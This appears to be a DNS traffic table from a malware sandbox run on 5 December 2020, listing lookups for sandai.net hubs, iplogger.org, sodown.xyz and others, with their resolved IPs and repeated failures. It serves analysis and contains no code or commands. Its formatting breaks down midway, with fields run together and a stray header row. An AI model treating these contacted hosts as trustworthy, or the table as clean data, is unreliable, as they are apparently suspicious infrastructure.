Dec 5, 2020 08:43:46.884772062 CET | 8.8.8.8 | 192.168.2.3 | 0x600a | No error (0) | hub5u.sandai.net | bgphub5u.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.884772062 CET | 8.8.8.8 | 192.168.2.3 | 0x600a | No error (0) | bgphub5u.sandai.net | | 39.98.57.143 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.884772062 CET | 8.8.8.8 | 192.168.2.3 | 0x600a | No error (0) | bgphub5u.sandai.net | | 47.92.75.245 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.884772062 CET | 8.8.8.8 | 192.168.2.3 | 0x600a | No error (0) | bgphub5u.sandai.net | | 39.100.9.39 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.894771099 CET | 8.8.8.8 | 192.168.2.3 | 0x7c2 | No error (0) | dream.pics | | 8.208.85.95 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.920553923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c1 | No error (0) | pmap.hz.sandai.net | pmap.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:46.920553923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c1 | No error (0) | pmap.sandai.net | | 47.97.7.140 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.921921015 CET | 8.8.8.8 | 192.168.2.3 | 0xf80f | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:46.959666014 CET | 8.8.8.8 | 192.168.2.3 | 0x6951 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:47.500004053 CET | 8.8.8.8 | 192.168.2.3 | 0xe8e2 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.046248913 CET | 8.8.8.8 | 192.168.2.3 | 0x1a3a | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | hub5sr.shub.hz.sandai.net | hub5t.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | hub5t.sandai.net | hub4t.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | hub4t.sandai.net | cnchub5sr.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cnchub5sr.sandai.net | cncidx.m.hub.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.64 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.44 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.40 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 112.64.218.154 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.6 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.150399923 CET | 8.8.8.8 | 192.168.2.3 | 0x7c5 | No error (0) | cncidx.m.hub.sandai.net | | 123.125.221.72 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.467833042 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.504851103 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.506387949 CET | 8.8.8.8 | 192.168.2.3 | 0xfb24 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | hub5pr.hz.sandai.net | hub5pr.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | hub5pr.sandai.net | bgphub5pr.sandai.net | | CNAME (Canonical name) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.39.6 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.169.85 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.195.246 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.194.216 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.171.207 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.534665108 CET | 8.8.8.8 | 192.168.2.3 | 0x7c6 | No error (0) | bgphub5pr.sandai.net | | 47.92.125.145 | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.541173935 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.542056084 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.576889992 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.578296900 CET | 8.8.8.8 | 192.168.2.3 | 0x5596 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.593235016 CET | 8.8.8.8 | 192.168.2.3 | 0x7b6a | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.614557981 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.616168976 CET | 8.8.8.8 | 192.168.2.3 | 0x88b9 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.654295921 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.654336929 CET | 8.8.8.8 | 192.168.2.3 | 0xe1d0 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.681833982 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.691803932 CET | 8.8.8.8 | 192.168.2.3 | 0x6fb | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.727684975 CET | 8.8.8.8 | 192.168.2.3 | 0x7c7 | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:48.729172945 CET | 8.8.8.8 | 192.168.2.3 | 0x621f | Name error (3) | imhub5pr.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.141067982 CET | 8.8.8.8 | 192.168.2.3 | 0xfec2 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.545767069 CET | 8.8.8.8 | 192.168.2.3 | 0xeaf4 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.582858086 CET | 8.8.8.8 | 192.168.2.3 | 0x20db | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.678586006 CET | 8.8.8.8 | 192.168.2.3 | 0xb67 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.899038076 CET | 8.8.8.8 | 192.168.2.3 | 0xeaf4 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.931978941 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.967845917 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.969422102 CET | 8.8.8.8 | 192.168.2.3 | 0xe49b | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:49.998538971 CET | 8.8.8.8 | 192.168.2.3 | 0x7c8 | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:50.009165049 CET | 8.8.8.8 | 192.168.2.3 | 0x709a | Name error (3) | score.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:50.218580008 CET | 8.8.8.8 | 192.168.2.3 | 0xd672 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:50.766110897 CET | 8.8.8.8 | 192.168.2.3 | 0x7fcd | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:51.312589884 CET | 8.8.8.8 | 192.168.2.3 | 0x2599 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
Dec 5, 2020 08:43:51.858886957 CET | 8.8.8.8 | 192.168.2.3 | 0x1faf | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.444046021 CET8.8.8.8192.168.2.30x7d31Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:52.993534088 CET8.8.8.8192.168.2.30x3923Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:56.660892010 CET8.8.8.8192.168.2.30x7a6dNo error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:57.274240017 CET8.8.8.8192.168.2.30xd060No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.hz.sandai.nethub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)hub5pnc.sandai.netcnc.hub5pnc.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.99.221A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.839428902 CET8.8.8.8192.168.2.30x27c6No error (0)cnc.hub5pnc.sandai.net47.92.100.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.hz.sandai.nethub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)hub5pn.sandai.netcnc.hub5pn.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.174A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.49A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.37A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net157.255.225.53A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.164A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net153.3.232.175A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.1A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.20A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net118.212.146.21A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net111.206.4.176A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net58.144.251.2A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.840177059 CET8.8.8.8192.168.2.30x49b7No error (0)cnc.hub5pn.sandai.net211.91.242.38A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.hz.sandai.nethub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)hub5u.sandai.netbgphub5u.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.100.9.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net47.92.75.245A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.881499052 CET8.8.8.8192.168.2.30xceb2No error (0)bgphub5u.sandai.net39.98.57.143A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.hz.sandai.nethub5c.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub5c.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.893302917 CET8.8.8.8192.168.2.30x7c0No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.hz.sandai.netpmap.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.899857998 CET8.8.8.8192.168.2.30x7c1No error (0)pmap.sandai.net47.97.7.140A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.63.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz172.67.208.194A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.910778999 CET8.8.8.8192.168.2.30x7c2No error (0)www.sodown.xyz104.18.62.67A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.919802904 CET8.8.8.8192.168.2.30x8e07Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.hz.sandai.nethubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)hubstat.sandai.netcnchubstat.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.136A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.921406031 CET8.8.8.8192.168.2.30x7c4No error (0)cnchubstat.sandai.net140.206.225.232A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:58.957159996 CET8.8.8.8192.168.2.30x1789Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5idx.shub.hz.sandai.nethub5t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub5t.sandai.nethub4t.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)hub4t.sandai.netcnchub5sr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cnchub5sr.sandai.netcncidx.m.hub.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.154A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.40A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net112.64.218.64A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.72A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.296776056 CET8.8.8.8192.168.2.30x7c3No error (0)cncidx.m.hub.sandai.net123.125.221.44A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.476078987 CET8.8.8.8192.168.2.30x3d74Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.007798910 CET8.8.8.8192.168.2.30xdf01Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.130484104 CET8.8.8.8192.168.2.30x302eNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.524380922 CET8.8.8.8192.168.2.30xbe4bName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.051537037 CET8.8.8.8192.168.2.30x841dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.585874081 CET8.8.8.8192.168.2.30xf3dbName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.hz.sandai.nethub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)hub5pr.sandai.netbgphub5pr.sandai.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.39.6A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.169.85A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.195.246A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.194.216A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.171.207A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.801523924 CET8.8.8.8192.168.2.30x7c5No error (0)bgphub5pr.sandai.net47.92.125.145A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.804965973 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.807198048 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.840622902 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.843271971 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.845679045 CET8.8.8.8192.168.2.30xaafdName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.882863045 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.884290934 CET8.8.8.8192.168.2.30x297bName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922142029 CET8.8.8.8192.168.2.30xbbbaName error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922636032 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.958138943 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.959275007 CET8.8.8.8192.168.2.30x9cd7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.995296001 CET8.8.8.8192.168.2.30x7c7Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.998722076 CET8.8.8.8192.168.2.30x95a8Name error (3)score.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.102962017 CET8.8.8.8192.168.2.30x112dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.258291006 CET8.8.8.8192.168.2.30x7007Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.287118912 CET8.8.8.8192.168.2.30x4483Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.294251919 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.323529005 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.332926989 CET8.8.8.8192.168.2.30x527Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.360413074 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.370055914 CET8.8.8.8192.168.2.30xac55Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.408910990 CET8.8.8.8192.168.2.30x3d9bName error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.409029961 CET8.8.8.8192.168.2.30x7c6Name error (3)imhub5pr.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.633642912 CET8.8.8.8192.168.2.30xcc35Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.172971010 CET8.8.8.8192.168.2.30x833dName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.722223043 CET8.8.8.8192.168.2.30x75f8Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.258011103 CET8.8.8.8192.168.2.30xdb3cName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.799576044 CET8.8.8.8192.168.2.30xd7ecName error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 5, 2020 08:44:05.341470003 CET | 8.8.8.8 | 192.168.2.3 | 0x4d11 | Name error (3) | relay.phub.hz.sandai.net | none | none | A (IP address) | IN (0x0001)
